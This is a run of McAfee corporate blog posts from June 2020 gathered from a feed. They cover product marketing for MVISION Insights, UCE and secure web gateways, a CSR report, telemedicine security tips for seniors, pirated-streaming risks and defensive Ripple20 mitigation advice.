MVISION Insights empowers McAfee MVISION EDR for the SOC analyst on many fronts by offering more actionable context to the SOC to be more proactive 

This kind of TI integration can reduce the unnecessary investigations that a SOC does and can also improve the speed and accuracy of the investigations that have resources assignedBy having the context of a threat (e.g. by having organized, curated TTPs for Campaigns, knowing the attack operation and objective, list of IOCs, etc.) the SOC analyst can leverage this context on a current investigation and really reduce the time and effort to complete the investigation. Additional context like this can both eliminate unnecessary investigations and accelerate the investigation to decisive resolution. 

TI Context is King But… 

We have seen that as EDR capabilities become adopted more widely, it is becoming increasingly clear that knowing what is happening on the endpoint and ‘looking for clues’ is not enough. Without meaningful and automated context from a properly integrated TI capability, companies are slower to identify malicious events, may not prioritize attack investigations for threats headed their way, and could take the wrong steps to remediate threatsThe problem is that time is critical: An attacker can use a couple of days to do really bad things in your network. Having effective automated signal-to-noise improvement through a properly integrated TI program can help you quickly detect and hunt down attackers and be proactive against threats headed your way but are not in your environment. 

Context is not just a brief writeup from a TIP or External Threat Intelligence FeedTypically, a human must read and interpret and analyze that feed, often leading to a significant delay in incorporating the information into the SOC response. In most cases, TI products do not offer enough remediation guidance, they just provide the threat profile.   

Properly integrated TI project can solve these problems and a superior TI integration can move the SOC to being proactiveMcAfee’s MVISION Insights delivers actionable intelligence and context in an automated way that can augment and speed investigations and make the SOC proactive with respect to threats that haven’t even been detected in the organization. By freeing up analysts from manual analysis of intelligence feeds, companies can catch more attacks more quickly and be proactive against threats targeting them. 

Moreover, the insight does not come from a few instances or open-source feeds, but from the entire McAfee customer base across the globe from over 1B sensors 

Many companies are delivering machine learning and artificial intelligence applications to security orchestration, automation and response. Very few possess the data and context from a customer base as large as ours.

Having right TI context from a well-respected source with statistical reach and a threat analysis that is actionable gives organizations confidence to address a sophisticated attacker before their attack, elevates this TI context to new heights while shifting cyber security to be more proactive.    

For more on McAfee Insights, check out our webinar.  

Get Ahead of the Adversary with Proactive Endpoint Security  

The post Meaningful Context for Your Endpoint Threat Investigations appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/endpoint-security/meaningful-context-for-your-endpoint-threat-investigations/feed/ 0
Industry Experts Weigh in on McAfee’s Proactive Cybersecurity https://www.mcafee.com/blogs/enterprise/industry-experts-weigh-in-on-mcafees-proactive-cybersecurity/ https://www.mcafee.com/blogs/enterprise/industry-experts-weigh-in-on-mcafees-proactive-cybersecurity/#respond Mon, 29 Jun 2020 17:19:06 +0000 /blogs/?p=102241

Recently Forbes shared an accurate depiction of McAfee in its article, McAfee Finally On The Right Path. Let me extend their innovation story and share with you the leadership path McAfee continues to blaze in cybersecurity.   Imagine if organizations knew of high severity threats targeting their industry sector and geographies before they encountered such threats, with precise knowledge if their countermeasures could stop the threat?  Also imagine if the countermeasures could not stop the threats, and they knew what they should do to improve those countermeasures so that the threat would be stopped? Doing all these […]

The post Industry Experts Weigh in on McAfee’s Proactive Cybersecurity appeared first on McAfee Blogs.

]]>

Recently Forbes shared an accurate depiction of McAfee in its articleMcAfee Finally On The Right PathLet me extend their innovation story and share with you the leadership path McAfee continues to blaze in cybersecurity 

Imagine if organizations knew of high severity threats targeting their industry sector and geographies before they encountered such threats, with precise knowledge if their countermeasures could stop the threat?  Also imagine if the countermeasures could not stop the threats, and they knew what they should do to improve those countermeasures so that the threat would be stopped? Doing all these actions, before an attack impacts you, is referred to as “shifting left on the attack lifecycle.  Gartner and many other analyst firms have openly expressed that shifting left is something a lot of vendors are trying to achieve. I am excited to announce that McAfee has found a way to do it. 

So, how did we do it? Enter McAfee MVISION InsightsWe previewed this innovation at MPOWER in October 2019 – an unique solution helping organizations become more proactive MVISION Insights is a cloud-native solution that provides highly predictive security analytics  These analytics enable proactive management and remediation against advanced attacks.  

 News of MVISION Insights created quite a buzz among industry influencers when we briefed them. The resounding point of view was that McAfee MVISION Insights is in a class of its own. and “ahead of the market”.  

A highly reputed analyst cast MVISION Insights at the same level of high esteem as McAfee’s highly acclaimed unified management solution, ePolicy Orchestrator 

“In the same way ePO is the gold standard for management consoles, Insights can be the same for the threat/analytics platform” 

– Top Tier Analyst Firm  

Yet other analysts called out the lack of immediate competition.   

“The vendor has stolen a march on some of its competitors, at least in the short term, with this offering. A lot of vendors are aiming to get to an offering comprising threat intel + prioritization + recommendations + automation, but few if any have actually reached that point today.” 

Omdia research. 

‘You are forward leaning and a differentiator in this space.  And it is even more impressive you did this organically while your competitors are trying to piece together with partnerships’ 

– Top Tier Analyst Firm 

Many vendors are making big claims about all the data they have access to and their rich telemetry, but they don’t weave the pieces together with why it is relevant to an organization’s environment. MVISION Insights not only prioritizes the threats based on prevalence in the organization’s geography and industry sector but also  takes the prioritized threat analysis and assesses your local security posture to see how it will stack up against the threat.  This value of the local security posture assessment against the threat was also called out, “…a key value point here is the local security posture assessment with the vast threat intelligence and analytics.”.   

ESG recognized “With the exposure of any new security attack, CISOs, CEOs, and corporate boards immediately ask whether they are at risk.  MVISION Insights from McAfee can help automate answers to this question.  This gives organization the ability to think globally, act locally, and respond quickly to cyber-attacks.” 

It’s not just threat analysis paralysis but prioritized actionable insights. 

With MVISION Insightsorganizations can answer critical questions quickly: Are they at risk? What is their priorityWill their protections hold? What do they need to do to be protected?  Take a closer look at MVISION Insights coming soon. Soon I plan to share the customer feedback we are receiving with organizations accessing the early solution. You don’t want to miss it.  

The post Industry Experts Weigh in on McAfee’s Proactive Cybersecurity appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/industry-experts-weigh-in-on-mcafees-proactive-cybersecurity/feed/ 0
McAfee Vision for SASE: Making Cloud Adoption Fast, Easy and Secure https://www.mcafee.com/blogs/enterprise/cloud-security/mcafee-vision-for-sase-making-cloud-adoption-fast-easy-and-secure/ https://www.mcafee.com/blogs/enterprise/cloud-security/mcafee-vision-for-sase-making-cloud-adoption-fast-easy-and-secure/#respond Fri, 26 Jun 2020 20:31:58 +0000 /blogs/?p=102223

While cloud services deliver on promised savings and convenience, keeping everything secure remains a moving target for many organizations. That’s because the enterprise perimeter has not only expanded, it has pushed the service edge to anywhere business takes you—or employees choose to go. Consequently, many organizations must uplevel how they protect cloud-based apps, data and […]

The post McAfee Vision for SASE: Making Cloud Adoption Fast, Easy and Secure appeared first on McAfee Blogs.

]]>

While cloud services deliver on promised savings and convenience, keeping everything secure remains a moving target for many organizations.

That’s because the enterprise perimeter has not only expanded, it has pushed the service edge to anywhere business takes you—or employees choose to go. Consequently, many organizations must uplevel how they protect cloud-based apps, data and services. Achieving success will be difficult with walled-garden style defenses found in legacy environments.

Gartner suggests an Adaptative Zero Trust approach (CARTA) to secure use of cloud applications, and it recommends a Secure Access Service Edge (SASE) framework to deliver connectivity and security for Cloud applications.

A lot of SASE vendors have focused on convergence of networking and security, but the key business goal of SASE is to protect applications and data in the cloud by building a pervasive edge that spans all manners of accessing these applications and data.

McAfee’s MVISION Unified Cloud Edge (UCE) delivers this pervasive edge and enables organizations to apply consistent data protection and threat prevention policies across their entire estate, including users, devices, locations and applications. Under the covers, MVISION UCE is convergence of Cloud Access Security Broker (CASB), next-gen Secure Web Gateway (SWG), and data loss protection (DLP) technologies delivered via a single global cloud fabric –with consistent policy and incident management.  Each of the MVISION UCE components provide coverage over distinct controls points that seamlessly deliver the pervasive edge:

  • McAfee CASB provides direct visibility and control over cloud-native interactions that are impossible to broker via a network/man-in-the-middle approach. This not only includes real time data and threat protection for data being stored/created in the cloud, it also includes on-demand scanning over existing data to identify both sensitive data and malware. The data objects could include files, messages and field data such as structured data objects in business applications like Salesforce.com, ServiceNow, Workday, etc.
  • McAfee’s next-gen SWG establishes proxy-based visibility and control over web traffic with deep awareness of cloud activity and data interactions. This keeps users safe from accidental data loss or malware, and it delivers the most advanced threat protection against ransomware, phishing attempts and other advanced attacks by integrating Remote Browser Isolation (RBI), a recommended part of a SASE architecture in our next-gen SWG.
  • A common DLP engine that provides device-to-cloud visibility and control over sensitive data on personal or managed devices, data resident and transacted in the cloud and data transiting over the network. McAfee MVISION UCE shares data classifications with all enforcement points for device, network, and the cloud with a single incident management console and API.

The convergence of cloud-native SWG and CASB also enables use cases that can extend network-delivered SASE controls with deep context of cloud applications in a single fabric. Many cloud-application-centric use cases that are critical in a post-COVID work from home scenario cannot be delivered by pure-play cloud SWGs, including:

  • The ability to apply contextual access control to users connecting to sanctioned Cloud applications directly over the internet, without a VPN. MVISION UCE ensures a user with a corporate device has full access to Microsoft 365, whereas a user with an unmanaged device has read-only access, which can be delivered by an app-proxy or remote browser isolation.
  • The ability to control unsanctioned Cloud applications at different levels of granularity including tenancy, activity and data. McAfee provides consistent policies that specifically identify and grant permissions to unsanctioned or personal services like OneDrive where the cloud user can be blocked from synching any data to personal OneDrive, or can be blocked from synching only “classified or sensitive” data to personal OneDrive.
  • The ability to protect against day-zero threats from the cloud in real time without any friction to the user experience. McAfee helps prevent end-user synching or downloading malware delivered from a trusted cloud storage provider such as OneDrive, Google Drive or  Dropbox.

In addition, most SASE vendors today focus on user to cloud security – otherwise known as front door controls, but that is not sufficient. Data and threats also need to be protected across side doors in the cloud. Protection also needs to be extended to backdoors within the cloud. McAfee’s MVISION UCE delivers side- and back-door controls that are not offered by any other SASE

  • Connected Application Control

Enables your architecture to discover SaaS applications or home-grown applications connected to each other via API channels. It can then authorize these API connections based on policies, risk and behavior of the connected application. For instance, a Sales VP connecting Clari, a sales forecasting mobile application, to the corporate Salesforce.com instance and pulling all the Salesforce.com data into Clari. The SASE architecture needs to be able to discover all such app-to-app connections and have granular policies around what scope of access should be allowed.

  • SaaS Cloud Security Posture Management (CSPM)

Allows your SASE architecture to assess and manage the security posture of your SaaS provider’s control and management planes. Specifically, Microsoft 365 has more than 200 individual configuration settings that need to be evaluated for an appropriate security posture of 365. For example, the default sharing permissions on Sharepoint that make shared links available to anyone in the world and never expire.

  • Sharing and Collaboration Control

Enables your architecture to control the transaction flow of sensitive data being shared inappropriately between users within the organization or across organizations via popular collaboration platforms such Microsoft OneDrive, Microsoft Teams, Slack, Zoom, etc. For example, McAfee helps ensure sensitive data is not posted to external (guest) users in Microsoft Teams.

Cloud-native

Long promised, cloud transformation is catching on at a time when enterprises increasingly rely upon cloud services to support their expanding digital activities. It can support large parts of the workforce who are working remotely and from home. Data and Threat controls must work in real-time as data moves to and from cloud applications. Accordingly, organizations need a cloud-native security architecture that is frictionless and ensures cloud applications function without latency or application breakage, and with security delivered in real-time. This real-time capability is not just necessary for network controls delivered by the SWG service; they are equally essential for cloud-native controls delivered via API and email gateways. Gartner describes the use of Points of Presence (POP) for global distribution and scale for SASE architectures. Most vendors offering SASE describe their footprint in terms of their network POPs. McAfee MVISION UCE has more than 50 globally distributed network POPs, but it also has similar scale and capacity for API and email POPs to ensure pervasive real-time control.

By our estimate, load increases on cloud security services in the last three months have soared from between 200% and 700%. While this surge has caused many other SASE providers to buckle, McAfee has logged an amazing 99.999% uptime! This is largely driven by our cloud-native architecture which does not rely on racking and stacking network appliances in public cloud, or by purely relying in colocation POPs that might have longer lead times to build-out and support burst capacity. McAfee MVSION UCE is not only built in a cloud-native (i.e. software- defined) manner deployed in POPs around the world, it also has ability to leverage public cloud providers such as AWS, Azure and GCP for burst POP capacity in order to deliver surge capacity without delay.

MVISION UCE, with its focus on protecting data and preventing threats in the cloud, along with its approach to both network-based and cloud-native controls, marks a key milestone on the path to implementing Gartner’s SASE framework.

Click here to learn more about McAfee MVISION UCE.

The post McAfee Vision for SASE: Making Cloud Adoption Fast, Easy and Secure appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/mcafee-vision-for-sase-making-cloud-adoption-fast-easy-and-secure/feed/ 0
How McAfee Makes an Impact: 2019 CSR Report Launch https://www.mcafee.com/blogs/other-blogs/executive-perspectives/how-mcafee-makes-an-impact-2019-csr-report-launch/ https://www.mcafee.com/blogs/other-blogs/executive-perspectives/how-mcafee-makes-an-impact-2019-csr-report-launch/#respond Thu, 25 Jun 2020 15:00:15 +0000 /blogs/?p=102166

At McAfee, we defend the world from cyber threats. We live our values daily. But most importantly, we recognize the power of inclusion and diversity in helping to create a better world inside and outside of McAfee. Recently, we launched our 2019 corporate social responsibility report—our Impact Report. Last year, just our second year as […]

The post How McAfee Makes an Impact: 2019 CSR Report Launch appeared first on McAfee Blogs.

]]>

At McAfee, we defend the world from cyber threats. We live our values daily. But most importantly, we recognize the power of inclusion and diversity in helping to create a better world inside and outside of McAfee.

Recently, we launched our 2019 corporate social responsibility report—our Impact Report. Last year, just our second year as the new McAfee, we published our collective actions and 2018 workforce demographics as part of McAfee’s first-ever Inclusion & Diversity Report.

This year, we’re providing greater insights on the progress we’re making to positively impact our people, our community, and our planet, together. As a company, we believe in proactively publishing this report with greater transparency, driving greater accountability and progress—not just for McAfee, but the industry as a whole.

We’ve made progress in our second year as the new McAfee and continue to reach major milestones. We achieved global pay parity. Our evolving hiring and retention practices brought us to the attainment of our 30% diversity goal and we made significant strides in our community outreach and sustainability practices.

We know genuine change requires continuous commitment and we’re up to the challenge. We look forward to working towards a more inclusive, sustainable world, and commit to refining our diversity hiring practices, ensuring equal career progression opportunities, actively developing cybersecurity interest in future generations, mobilizing our employees in their communities, and doing our part to protect our planet.

To understand the reach of McAfee’s impact, you can browse the report or read the highlights below.

No alt text provided for this image

The post How McAfee Makes an Impact: 2019 CSR Report Launch appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/executive-perspectives/how-mcafee-makes-an-impact-2019-csr-report-launch/feed/ 0
Medical Care #FromHome: Telemedicine and Seniors https://www.mcafee.com/blogs/consumer/medical-care-fromhome-telemedicine-and-seniors/ Wed, 24 Jun 2020 13:43:11 +0000 /blogs/?p=102142 Telemedicine visit

Medical Care From Home: Telemedicine and Seniors For weeks and even months now, millions of us have relied on the internet in ways we haven’t before. We’ve worked remotely on it, our children have schooled from home on it, and we’ve pushed the limits of our household bandwidth as families have streamed, gamed, and conferenced […]

The post Medical Care #FromHome: Telemedicine and Seniors appeared first on McAfee Blogs.

]]>
Telemedicine visit

Medical Care From Home: Telemedicine and Seniors

For weeks and even months now, millions of us have relied on the internet in ways we haven’t before. We’ve worked remotely on it, our children have schooled from home on it, and we’ve pushed the limits of our household bandwidth as families have streamed, gamed, and conferenced all at the same time. Something else is new—more and more of us have paid visits to our doctors and healthcare professionals  on the internet. Needless to say, this is an entirely new experience for many. And with that, I got to thinking about seniors. What’s been their experience with telemedicine? What concerns have they had? And how can we help?

For starters, an online doctor’s visit is known as telemedicine—a way of getting a medical issue diagnosed and treated remotely. With telemedicine, care comes by way of your smartphone or computer via a video conference or a healthcare provider’s portal.

Telemedicine is not new at all. It’s been in use for some time now, such as in rural communities that have little access to local healthcare professionals, in cases of ongoing treatment like heart health monitoring and diabetes care, and situations where a visit to the doctor’s office simply isn’t practical. What is new is this: the use of telemedicine has made a significant leap in recent months.

Telemedicine for seniors (and everyone else) is on the rise

A recent global consumer survey by Dynata  took a closer look at this trend. The research spanned age groups and nations across North America and Europe, which found that 39% of its respondents consulted a physician or healthcare professional online in the past few months. Of them, two-thirds said they used telemedicine as part of their care. Yet more telling, 84% of those who recently had a telemedicine appointment said this was the first time they used telemedicine.

The study also looked at their attitudes and experiences with telemedicine based on age and reported that members of the Baby Boomer generation found the experience to be satisfactory—just over 55%. Interestingly, this was quite consistent across other age groups as well, with all of them hovering just above or below that same level of satisfaction.

Have seniors changed their feelings about telemedicine?

One other study gives us some insight into how the opinions seniors hold about telemedicine may have changed in the past year. We can contrast the findings above with a University of Michigan study that polled American adults aged 50 to 80 in the middle of 2019. On the topic of telemedicine, the research found that:

  • 64% would consider using telemedicine if they had an unexpected illness while traveling
  • 58% saw it as an option for a return visit or follow-up
  • 34% would use it to address a new health concern

The study also asked how older Americans felt about telemedicine visits. At that time in 2019, only 14% said that their provider offered telemedicine visits, while 55% didn’t know if they had the option available to them at all. Just a small number, 4%, said they’d had a telemedicine visit within the year. Needless to say, it’ll be interesting to see what 2020’s results would have to say should the university run this poll again.

In terms of their experience with telemedicine, those who had at least one telemedicine visit, 58% felt that in-person office visits provided an overall better level of care and about 55% felt that in-person visits were better for communicating with their health care professional and feeling better cared-for overall.

Older adults and seniors express concerns about telemedicine

Citing the same University of Michigan study from last year, some of the concerns older adults shared are what you might expect, even regardless of age. The lack of a physical exam (71%), worries that the care might not be as good as a face-to-face visit (68%), and losing the feeling of a personal connection with their health care professional (49%) all ranked high.

Of note, three other concerns around technology also topped the responses:

  • Privacy (49%)
  • Issues using the technology needed to connect (47%)
  • Difficulty seeing or hearing their care provider (39%)

Once again, you can make a strong case that plenty of people might share these same concerns—not just seniors.

Your first telemedicine visit

On the subject of the actual telemedicine visit, let’s turn to some expert advice on the topic. The AARP (American Association of Retired Persons) offers a step-by-step guide on how to prepare for your first telemedicine visit. Their first piece of advice is “make sure you are tech-ready” for your appointment. And that’s one place I can help. Let’s take a look at some of those top concerns about technology.

Some of my advice here mirrors what I shared a few weeks ago about getting ready for and online job interview, and you can keep the following in mind:

Pick your device of choice and get it set up for telemedicine

You’ll need a device for your visit, so choose the one you know and that you’re comfortable with. That’s probably your computer or laptop. And just like with any video conferencing you do, spend some time getting familiar with how to set the microphone levels, speaker volume, and the camera. For audio, you can use a set of smartphone earbuds, which can help prevent audio feedback loops and simply make it easier to hear your caregiver.

As for cameras, many laptops have them built in as a standard feature. If that’s not the case for you, or if you have a desktop computer without a camera, there are several inexpensive options. If you’re shopping around, do a little research. There are plenty of reputable sites that provide mini-reviews, pricing overviews, and give you a sense for where you can make your purchase right now.  As with any connected device, be sure to change any default passwords to a strong, unique password.

And if you can, do a dry run before your appointment. Reach out to a friend or relative and set up a quick video call with your computer or laptop. That way, you can get a feel for the experience and fine tune your settings as you like.

In other instances, the care provider will have an app that you’ll need to download or an online portal that you’ll need to access. If this is the case, don’t worry. You can still practice using your camera and your audio ahead of time with a trusted video conferencing application like Apple’s FaceTime or Microsoft’s Skype.

Make sure your technology is secure

If you don’t already have a comprehensive security solution in place, get one. This will protect you against malware, viruses, and phishing attacks. You’ll also benefit from other features that help you manage your passwords, protect your identity, safeguard your privacy, and more.

As for privacy in general, medical information is among the most precious information you have. For example, here in the U.S., we have HIPPA privacy standards to protect our medical records and conversations. Yet there’s also the issue of eavesdropping , which is a risk in practically any online communication. Here, you’ll want to do some research. A reputable health care provider will have a comprehensive set of Frequently Asked Questions (FAQ) available as part of their telemedicine service, which should include a section on your personal privacy and the technology they use. (Here’s a good example of a telemedicine FAQ from University of Washington Medicine.) Consult that FAQ, and if you have further questions, feel free to call the healthcare provider and speak with them.

If you find yourself searching online for a telemedicine provider, look out for bad links and phishing scams. It’s a sad state of affairs, yet hackers are capitalizing on today’s healthcare climate just as they’ve taken advantage of innocent people in times of need before. Use a web advisor with your browser that will alert you of malicious links and never click any link or open any email that you’re unsure of. Again, your security software should help you steer clear of trouble.

The best telemedicine choice is the one that is right for you

We’ve welcomed the internet into so many aspects of our lives, right on down to purchasing connected refrigerators and washing machines. Yet inviting the internet into other aspects of our lives, like our health and that of our loved ones, may not come so quickly. To put it bluntly, getting comfortable with the idea of online doctor’s visits may take some time. However, with research and conversation with your healthcare provider, you may find that a telemedicine visit will work just as well, or well enough, as an in-person visit in some cases. As you make those very personal decisions for yourself, I hope this article and the resources cited within it helps you make a choice that’s absolutely right for you.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Medical Care #FromHome: Telemedicine and Seniors appeared first on McAfee Blogs.

]]>
Read Before You Binge-Watch: Here are the TV Shows & Movies to Look Out For https://www.mcafee.com/blogs/consumer/mcafee-findings-reveals-tv-shows-movies/ Tue, 23 Jun 2020 04:01:52 +0000 /blogs/?p=101832

If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time. In fact, according to Nielson, there was an 85% increase in American streaming rates in the first three weeks of March this year compared to March 2019 reports.    But having multiple streaming subscriptions can quickly add up. Consequentially, users who are […]

The post Read Before You Binge-Watch: Here are the TV Shows & Movies to Look Out For appeared first on McAfee Blogs.

]]>

If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time. In fact, according to Nielson, there was an 85% increase in American streaming rates in the first three weeks of March this year compared to March 2019 reports.   

But having multiple streaming subscriptions can quickly add up. Consequentially, users who are hesitant to pay more for online streaming subscriptions often look for free options to stream their favorite TV show or movie.  

Criminals are often behind these websites, luring unsuspecting users into schemes via “free” downloads of movies and TV shows.   Some of these movies and shows are risker than others, however.  McAfee WebAdvisor data has revealed certain titles are tied to potential malware and phishing threats. 

Let’s take a look at the TV shows and movies that could lead you to a dangerous download instead of your next film spree, as well as discuss what users can do to stay secure. 

Top 10 U.S. TV and Movie Titles That Could Lead You to a Dangerous Download:

Top 10 U.S. TV Titles  Top 10 U.S. Movie Titles 
“Brooklyn Nine-Nine”  “Warrior” 
“Elite”  “Zombieland” 
“Harlots”  “The Incredibles” 
Letterkenny”  Step Brothers”   
“Poldark”  “Bad Boys” 
“Lost”  “Aladdin” (2019) 
“You”  “The Lion King” (1994)
“Gentefied”  “Swingers” 
“PEN15”  “Frozen 2” 
“Skins  “The Invitation” 

Stay Protected While Streaming

While consumers search for new content from home, criminals are clearly searching for ways to trick eager TV and movie fans. However, there’s still way users can stay both entertained and secure during this time. Follow these tips to help ensure that your online entertainment experience is safe 

Watch what you click

Users looking to catch up on Season 2 of “You” or watch the “The Incredibles” on repeat should be cautious and only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from credible websitesinstead of downloading a “free” version from a website that could contain malware. 

Refrain from using illegal streaming sites

Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source. 

Use a comprehensive security Solution

Use a solution like McAfee Total Protection. This can help protect your devices from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites. Additionally, McAfee WebAdvisor can be accessed as a free download.  

Use parental control software

Kids are techsavvy and may search for movies by themselves. Ensure that limits are set on your child’s device and use software that can help minimize exposure to potentially malicious or inappropriate websites. 

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.  

*Methodology: McAfee pulled the most popular TV and movie titles available on U.S. streaming sites according to “best of” articles by a range of U.S. publications. The web results for the searches of the entertainment titles with modifying terms, such as “TV show” and “torrent,” were then analyzed. Other popular modifying search terms include “free download,” “free login,” “free,” and “pirated download.” From there, the resulting URLs and domains were measured using McAfee WebAdvisor data and assigned a score of high, medium, or unverified risk. The results identified the top 10 TV shows and movie titles with the highest risk of being used by criminals to spread malware and phishing threats.  

The post Read Before You Binge-Watch: Here are the TV Shows & Movies to Look Out For appeared first on McAfee Blogs.

]]>
Ripple20 Vulnerability Mitigation Best Practices https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-vulnerability-mitigation-best-practices/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-vulnerability-mitigation-best-practices/#respond Mon, 22 Jun 2020 22:32:25 +0000 /blogs/?p=102115

On June 16th, the Department of Homeland Security and CISA ICS-CERT issued a critical security advisory warning covering multiple newly discovered vulnerabilities affecting Internet-connected devices manufactured by multiple vendors. This set of 19 vulnerabilities in a low-level TCP/IP software library developed by Treck has been dubbed “Ripple20” by researchers from JSOF. A networking stack is a software component […]

The post Ripple20 Vulnerability Mitigation Best Practices appeared first on McAfee Blogs.

]]>

On June 16th, the Department of Homeland Security and CISA ICS-CERT issued a critical security advisory warning covering multiple newly discovered vulnerabilities affecting Internet-connected devices manufactured by multiple vendors. This set of 19 vulnerabilities in a low-level TCP/IP software library developed by Treck has been dubbed “Ripple20” by researchers from JSOF.

A networking stack is a software component that provides network connectivity over the standard internet protocols. In this specific case these protocols include ARP, IP (versions 4 and 6), ICMPv4, UDP and TCP communications protocols, as well as the DNS and DHCP application protocols. The Treck networking stack is used across a broad range of industries (medical, government, academia, utilities, etc.), from a broad range of device manufacturers – a fact which enhances their impact and scope, as each manufacturer needs to push an update for their devices independently of all others. In other words, the impact ripples out across the industry due to complexities in the supply and design chains.

Identifying vulnerable devices on your network is a crucial step in assessing the risk of Ripple20 to your organization. While a simple Shodan search for “treck” shows approximately 1000 devices, which are highly likely to be internet-facing vulnerable devices, this represents only a fraction of the impacted devices. Identification of the Treck networking stack vs. other networking stacks (such as the native Linux or Windows stacks) requires detailed analysis and fingerprinting techniques based on the results of network scans of the devices in question.

The impact of these vulnerabilities ranges from denial of service to full remote code exploitation over the internet, with at least one case not requiring any authentication (CVE-2020-11901). JSOF researchers identified that these vulnerabilities impact a combination of traditional and IoT devices. Customers should review advisories from vendors such as Intel and HP because non-IoT devices may be running firmware that makes use of the Treck networking stack.

Ripple20’s most significant impact is to devices whose network stack is exposed (in general IoT devices incorporating the Treck network stack) as compared to devices that incorporate the stack that it is only exposed to the local device. We recommend that you audit all network-enabled devices to determine if they are susceptible to these vulnerabilities.

There are potentially tens of millions of devices that are vulnerable to at least one of the Ripple20 flaws. Mitigating impact requires attention from both device owners and device vendors.

Mitigations for users of vulnerable devices per CISA recommendations (where possible): 

  • Patch any device for which a vendor has released an update.
  • Practice the principle of least privilege for all users and devices (devices and users should only have access to the set of capabilities needed to accomplish their job). In this case, minimize network exposure and internet-accessibility for all control system devices.
  • Locate control system networks and remote devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices. VPN solutions should use multi-factor authentication.
  • Use caching DNS servers in your organization, prohibiting direct DNS queries to the internet. Ideally, caching DNS servers should utilize DNS-over-HTTPS for lookups.
  • Block anomalous IP traffic by utilizing a combination of firewalls and intrusion prevention systems.

Where Can I Go to Get More Information?

Please review KB93020 for more information and subscribe for updates.

The post Ripple20 Vulnerability Mitigation Best Practices appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-vulnerability-mitigation-best-practices/feed/ 0
What to Expect from the Next Generation of Secure Web Gateways https://www.mcafee.com/blogs/enterprise/cloud-security/what-to-expect-from-the-next-generation-of-secure-web-gateways/ https://www.mcafee.com/blogs/enterprise/cloud-security/what-to-expect-from-the-next-generation-of-secure-web-gateways/#respond Mon, 22 Jun 2020 19:42:27 +0000 /blogs/?p=102097

After more than a century of technological innovation since the first units rolled off Henry Ford’s assembly lines, automobiles and transportation bear little in common with the Model T era. This evolution will continue as society finds better ways to achieve the outcome of moving people from point A to point B. While secure web […]

The post What to Expect from the Next Generation of Secure Web Gateways appeared first on McAfee Blogs.

]]>

After more than a century of technological innovation since the first units rolled off Henry Ford’s assembly lines, automobiles and transportation bear little in common with the Model T era. This evolution will continue as society finds better ways to achieve the outcome of moving people from point A to point B.

While secure web gateways (SWGs) have operated on a far more compressed timetable, a similarly drastic evolution has taken place. SWGs are still largely focused on ensuring users are protected from unsafe or non-compliant corners of the internet, but the transition to a cloud- and remote-working world has created new security challenges that the traditional SWG is no longer equipped to handle. It’s time for the next generation of SWGs that can empower users to thrive safely in an increasingly decentralized and dangerous world.

How We Got Here

The SWG actually started out as a URL filtering solution and enabled organizations to ensure that employees’ web browsing complied with corporate internet access policy.

URL filtering then transitioned to proxy servers sitting behind corporate firewalls. Since proxies terminate traffic coming from users and complete the connection to the desired websites, security experts quickly saw the potential to perform more thorough inspection than just comparing URLs to existing blacklists. By incorporating anti-virus and other security capabilities, the “secure web gateway” became a critical part of modern security architectures. However, the traditional SWG could only play this role if it was the chokepoint for all internet traffic, sitting at the edge of every corporate network perimeter and having remote users “hairpin” back through that network via VPN or MPLS links.

Next-Generation SWG

The transition to a cloud and remote-working world has put new burdens on the traditional perimeter-based SWG. Users can now directly access IT infrastructure and connected resources from virtually any location from a variety of different devices, and many of those resources no longer reside within the network perimeter on corporate servers.

This remarkable transformation also expands the requirements for data and threat protection, leaving security teams to grapple with a number of new sophisticated threats and compliance challenges. Unfortunately, traditional SWGs haven’t been able to keep pace with this evolving threat landscape.

Just about every major breach now involves sophisticated multi-level web components that can’t be stopped by a static engine. The traditional SWG approach has been to coordinate with other parts of the security infrastructure, including malware sandboxes. But as threats have become more advanced and complex, doing this has resulted in slowing down performance or letting threats get through. This is where Remote Browser Isolation (RBI) brings in a paradigm shift to advanced threat protection. When RBI is implemented as an integral component of SWG traffic inspection, and with the right technology like pixel mapping, it can deliver real-time, zero-day protection against ransomware, phishing attacks and other advanced malware while not hindering the browsing experience.

Another issue revolves the encrypted nature of the internet. The majority of web traffic and virtually all cloud applications use SSL or TLS to protect communications and data. Without the ability to decrypt, inspect and re-encrypt traffic in a compliant, privacy-preserving manner, a traditional SWG is simply not able to cope with today’s world.

Finally, there is the question of cloud applications. While cloud applications operate on the same internet as traditional websites, they function in a fundamentally different way that traditional SWGs simply can’t understand. Cloud Access Security Brokers (CASBs) are designed to provide visibility and control over cloud applications, and if the SWG doesn’t have access to a comprehensive CASB application database and sophisticated CASB controls, it is effectively blind to the cloud.

 

What we need from Next-Gen SWGs

Fig. Next Generation Secure Web Gateway Capabilities

A next-gen SWG should help simplify the implementation of Secure Access Service Edge (SASE) architecture and help accelerate secure cloud adoption. At the same time, it needs to provide advanced threat protection, unified data control, and efficiently enable a remote and distributed workforce.

Here are some of the use cases:

